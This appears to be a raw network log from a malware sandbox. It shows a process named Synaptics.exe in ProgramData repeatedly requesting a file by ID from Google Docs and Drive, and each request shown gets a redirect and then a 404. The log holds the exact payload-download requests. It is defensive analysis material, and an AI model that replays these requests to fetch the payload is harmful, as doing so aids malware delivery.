                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.749874142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:10 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ooYVZFYZCPmqCA7c8J9LJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.749875142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:10 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-23A9bjUlIpD1eel2OzSQgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.749885142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:11 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7D8EYVwrZ65q-wBDCrbqclGYkQZmUy--ZA0fMzBRItSOe2exz2e4ahGHuQD5tPxLrK
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-IsE7cgg9OWNgmp-IjqyAwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:11 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:11 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 49 6e 58 4e 73 32 69 57 31 4f 64 51 4d 54 42 47 37 6d 71 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="VInXNs2iW1OdQMTBG7mq2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:11 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        13192.168.2.749886142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:11 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-rGvV9JpJoJDmLiDPXS9AeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        14192.168.2.749890142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:12 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7wL1O7eGnQfbIyjnu79wQMcr1xxpXFfx4rB0hz0kJS5zRKSOxBeOrqX3ZsAFcV-R1G
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-J0qKS794tsts7Nnm1xi5yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:12 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:12 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 57 78 46 35 73 4d 30 51 44 6d 44 69 38 68 47 75 67 39 43 4f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="1WxF5sM0QDmDi8hGug9COw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:12 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        15192.168.2.749891142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:11 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-K6gFCVeo9eJu64PWrZOxpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        16192.168.2.749897142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:12 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-gPKuonnt3-W1o9Ij1xBPIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        17192.168.2.749898142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:12 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:13 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6lgwcndIXYwfhWTqDwc76KZyCFonio53XjCTUiLrOsnKS02CUf0FrsfO0J3pQqmPIKhl8MTG4
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:12 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-mkOU95CkWifPwCZYfySFIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:13 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:13 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 66 49 74 4b 4c 42 66 37 5a 56 41 36 5f 79 48 45 6e 57 6f 45 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="PfItKLBf7ZVA6_yHEnWoEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
